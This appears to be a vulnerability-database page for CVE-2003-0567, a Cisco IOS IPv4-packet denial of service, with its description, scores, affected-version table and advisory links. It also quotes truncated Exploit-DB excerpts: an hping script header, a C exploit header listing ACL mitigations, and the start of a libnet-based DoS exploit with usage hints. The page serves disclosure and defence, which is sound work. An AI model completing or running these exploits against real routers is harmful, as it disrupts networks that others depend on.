CVE-2003-0567
published 2003-08-18CVE-2003-0567: Cisco IOS 11.x and 12.0 through 12.2 allows remote attackers to cause a denial of service (traffic block) by sending a particular sequence of IPv4 packets to…
PriorityP338high7.8CVSS 2.0
AVNACLAuNCNINAC
EXPLOIT
EPSS
16.58%
96.6th percentile
Cisco IOS 11.x and 12.0 through 12.2 allows remote attackers to cause a denial of service (traffic block) by sending a particular sequence of IPv4 packets to an interface on the device, causing the input queue on that interface to be marked as full.
Affected
175 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
| cisco | ios | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Cisco IOS - using hping Remote Denial of Service
exploitdb·2003-07-22
CVE-2003-0567 Cisco IOS - using hping Remote Denial of Service
Cisco IOS - using hping Remote Denial of Service
---
#!/bin/tcsh -f
#
# Remote DoS exploit against the recent Cisco IOS vuln. Cisco doc. 44020
# Vulnerable versions - all Cisco devices running IOS.
# Requirements : tcsh, and hping.
# Get hping @ www.hping.org
#
# And you know the best part? This script actually works! Unlike the few .c's
# floating around the net. Uses swipe for the protocol bit. Also, need to be uid=0,
# OR +s ciscodos.sh because of hping opening raw sockets.
#
# Example :
#
# root@evicted # ping 192.168.1.1
# PING 192.168.1.1 (192.168.1.1): 56 data bytes
# 64 bytes from 192.168.1.1: icmp_seq=0 ttl=150 time=1.287 ms
# 64 bytes from 192.168.1.1: icmp_seq=1 ttl=150 time=0.817 ms
# --- 192.168.1.1 ping statistics ---
# 2 packets transmitted, 2 packets received, 0% packet l
Exploit-DB
Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service
exploitdb·2003-07-21
CVE-2003-0567 Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service
Cisco IOS - 'cisco-bug-44020.c' IPv4 Packet Denial of Service
---
/*******************************************************/
/* cisco-bug-44020.c - Copyright by Martin Kluge ([email protected]) */
/* */
/* Feel free to modify this code as you like, as long as you include */
/* the above copyright statement. */
/* */
/* Please use this code only to check your OWN cisco routers. */
/* */
/* */
/* This exploit uses the bug in recent IOS versions to stop router */
/* from processing traffic once the input queue is full. */
/* */
/* */
/* Use access control lists as described in the CISCO advisory to */
/* protect your cisco routers: */
/* */
/* access-list 101 deny 53 any any */
/* access-list 101 deny 55 any any */
/* access-list 101 deny 77 any any */
/* access-list 101 deny 103 any any */
/*
Exploit-DB
Cisco IOS - IPv4 Packets Denial of Service
exploitdb·2003-07-18
CVE-2003-0567 Cisco IOS - IPv4 Packets Denial of Service
Cisco IOS - IPv4 Packets Denial of Service
---
/*
* ShadowChode - Cisco IOS IPv4 Packet Processing Denial of Service Exploit
*
* Ping target router/switch for TTL to host. Subtract that number from 255
* and use that TTL on the command line. The TTL must equal 0 or 1 when it
* reaches the target. The target must accept packets to the given target
* interface address and there are some other caveats.
*
* BROUGHT TO YOU BY THE LETTERS C AND D
*
* [L0cK]
*/
#include
#include
#include "libnet.h"
#define MIN_PAYLOAD_LEN (26)
#define CLEANUP { \
libnet_destroy(lh); \
free(payload); \
}
int
main(int argc, char *argv[])
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *lh;
u_long dst_addr;
int ttl;
int payload_len;
char *payload;
libnet_ptag_t data_tag;
libnet_ptag_t ip_tag;
int i;
int len;
int
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/006743.htmlhttp://www.cert.org/advisories/CA-2003-15.htmlhttp://www.cert.org/advisories/CA-2003-17.htmlhttp://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtmlhttp://www.kb.cert.org/vuls/id/411332https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5603http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/006743.htmlhttp://www.cert.org/advisories/CA-2003-15.htmlhttp://www.cert.org/advisories/CA-2003-17.htmlhttp://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtmlhttp://www.kb.cert.org/vuls/id/411332https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A5603
2003-08-18
Published